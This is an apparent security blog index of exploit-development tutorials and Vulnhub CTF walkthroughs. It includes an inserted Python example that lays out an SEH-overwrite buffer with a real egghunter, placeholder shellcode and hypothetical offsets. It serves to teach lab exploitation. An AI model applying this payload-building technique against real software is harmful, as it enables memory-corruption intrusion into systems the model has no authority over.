Ascii of D00M

You are in for a treat. Have you ever encoded your own payloads? You will if you follow along. For this tutorial I am going to be using SipXezPhone, which is vulnerable to yet another SEH overflow, this time triggered by an over-long CSeq header. By now, you should […]

Egghunting Sorcery

This post piggybacks off my last post, "Stacks and Handlers and Python, oh my!". To follow along, please take a few seconds to head to that page and download the vulnerable software. If you do not have WinDbg, Immunity, or Mona, that page has the downloads for them as […]

Stacks and Handlers and Python, oh my!

Another overflow, and this one is going to be good 😉 This one is about overcoming SEH (Structured Exception Handling): we overwrite an exception handler record on the stack and use it to jump to our shellcode, which is what ends up executing our sweet, sweet payload. Exploiting it this way, we do not need to overwrite EIP directly as the first step like we did in a regular stack overflow; control arrives when an exception is raised and the overwritten handler gets called. We actually […]
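To make the SEH layout, the egghunter from the "Egghunting Sorcery" post and the bad-character check from "Ascii of D00M" concrete, here is an added Python example that is not code from any of the posts. The offset to the nSEH field, the POP/POP/RET address, the bad-character set and the placeholder shellcode are all hypothetical values for illustration; in practice each of them comes out of the debugger work the posts walk through. The 32-byte egghunter is Skape's well-known NtAccessCheckAndAuditAlarm hunter, and the egg tag is the usual "w00t".

```python
import struct

# Everything below is a constructed illustration. The offset, the gadget
# address and the placeholder shellcode are NOT taken from the posts.
OFFSET_TO_NSEH = 1000             # hypothetical: bytes from buffer start to nSEH
POP_POP_RET = 0x625011AF          # hypothetical: address of a POP/POP/RET gadget
BAD_CHARS = b"\x00\x0a\x0d"       # hypothetical: typical set for a text protocol header
EGG = b"w00t"

# Skape's public 32-byte NtAccessCheckAndAuditAlarm egghunter. It walks memory
# a page at a time, asks the kernel whether the page is readable, and only
# then compares bytes, so it never faults on unmapped pages.
EGGHUNTER = b"".join([
    b"\x66\x81\xca\xff\x0f",   # or dx, 0x0fff     ; align to end of page
    b"\x42",                   # inc edx           ; next page / next byte
    b"\x52",                   # push edx
    b"\x6a\x02",               # push 0x02         ; NtAccessCheckAndAuditAlarm
    b"\x58",                   # pop eax
    b"\xcd\x2e",               # int 0x2e          ; syscall probes [edx]
    b"\x3c\x05",               # cmp al, 0x05      ; STATUS_ACCESS_VIOLATION?
    b"\x5a",                   # pop edx
    b"\x74\xef",               # je  <next page>
    b"\xb8" + EGG,             # mov eax, "w00t"   ; the hunter holds ONE copy
    b"\x8b\xfa",               # mov edi, edx
    b"\xaf",                   # scasd             ; first copy of the egg?
    b"\x75\xea",               # jne <next byte>
    b"\xaf",                   # scasd             ; second copy?
    b"\x75\xe7",               # jne <next byte>
    b"\xff\xe7",               # jmp edi           ; land right after "w00tw00t"
])

NSEH = b"\xeb\x06\x90\x90"      # jmp short +6: hop over the 4-byte handler field
SHELLCODE = b"\xcc" * 16        # constructed stand-in; a real payload goes here


def check_bad_chars(data: bytes, bad: bytes = BAD_CHARS) -> list:
    """Return (offset, byte) pairs in data that collide with bad characters."""
    return [(i, b) for i, b in enumerate(data) if b in bad]


def build_seh_payload() -> bytes:
    """Lay out an SEH overwrite:

    [junk ... egg egg shellcode ... junk][nSEH][SEH][egghunter]

    After the overwritten handler (POP/POP/RET) returns into nSEH, the short
    jump lands on the egghunter, which scans memory for the doubled egg and
    jumps to the shellcode. The shellcode can therefore sit anywhere; here it
    is buried inside the junk that precedes the handler record.
    """
    marker = EGG * 2 + SHELLCODE
    junk_before = b"A" * 200
    junk_after = b"A" * (OFFSET_TO_NSEH - len(junk_before) - len(marker))
    return (
        junk_before
        + marker
        + junk_after
        + NSEH                               # overwrites the next-SEH pointer
        + struct.pack("<I", POP_POP_RET)     # overwrites the handler pointer
        + EGGHUNTER
    )


def locate_shellcode(memory: bytes) -> int:
    """Mimic the hunter's search: find the doubled egg and return the offset
    of the byte after it, or -1 if no doubled egg exists."""
    idx = memory.find(EGG * 2)
    return -1 if idx == -1 else idx + len(EGG) * 2


if __name__ == "__main__":
    payload = build_seh_payload()
    seh = struct.unpack("<I", payload[OFFSET_TO_NSEH + 4:OFFSET_TO_NSEH + 8])[0]
    print("nSEH at offset", OFFSET_TO_NSEH, "handler ->", hex(seh))
    print("egghunter lands on shellcode at offset", locate_shellcode(payload))
    print("bad characters in payload:", check_bad_chars(payload))
```

The doubled egg is not decoration: the hunter itself contains a single "w00t" (the `mov eax` immediate), so searching for one copy would make the hunter find itself. Run `check_bad_chars` on the finished buffer before sending it; if it reports anything, that is the point where the encoding work from the "Ascii of D00M" post comes in.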

Gibson Walkthrough

Can you hack le Gibson? Here is how I went about doing it, and it was absolutely fun. Loved the twist that was in there. You can find Gibson here. Quick run-down: enumeration kung-fu, exploitation, read flag 🙂 Exploit used: OverlayFS local privilege escalation. Once we see who is on our net, as always, we begin to enumerate our […]

Intro to Buffer Overflows

Buffer overflows. How fun they can be, but intimidating if you have never fired up a debugger of any sort: little numbers everywhere in four different panes, each pane with its own specific purpose. Awesome. Get what you need first so you can follow along and kick some ass: PCMan FTP Server, Immunity […]

SickOs 1.2 Walkthrough

You can find SickOs here. Quick run-down: service enumeration, check for any vulnerabilities, escalate to root, get our flag 🙂 Exploit used: Chkrootkit 0.49. After seeing what is on my net, I ran an Nmap scan against my target to see what kind of services are running. I see port 80 open […]

Droopy: v0.2 Walkthrough

TL;DR: If you would rather watch, here is a fairly short video on getting root; the steps are below. Also, dubstep is playing, so if you don't like it, please mute 🙂 You can find this VM here. It is a beginner's boot2root, so let's see how this goes. Quick run-down: find services, play with […]

Down with OSCP?? Yea, you know me!

Back in February of last year, I had finally saved up enough pennies to purchase the Penetration Testing with Kali Linux course. I was not fully aware of what I was getting myself into, despite reading the syllabus. As a side note, if you are planning to take this course, please prepare yourself for the headaches, the frustration, and especially the time. You'll need […]

Simple CTF Walkthrough

Yesterday, I noticed there was a new-ish virtual machine on Vulnhub called Simple CTF. As the adventurous pioneer I am, I downloaded it and booted it right up. This is how I rooted Simple, and it was indeed simple, haha! A quick run-down of what I did: service enumeration, check for vulnerabilities, exploitation, privilege escalation, read the flag in […]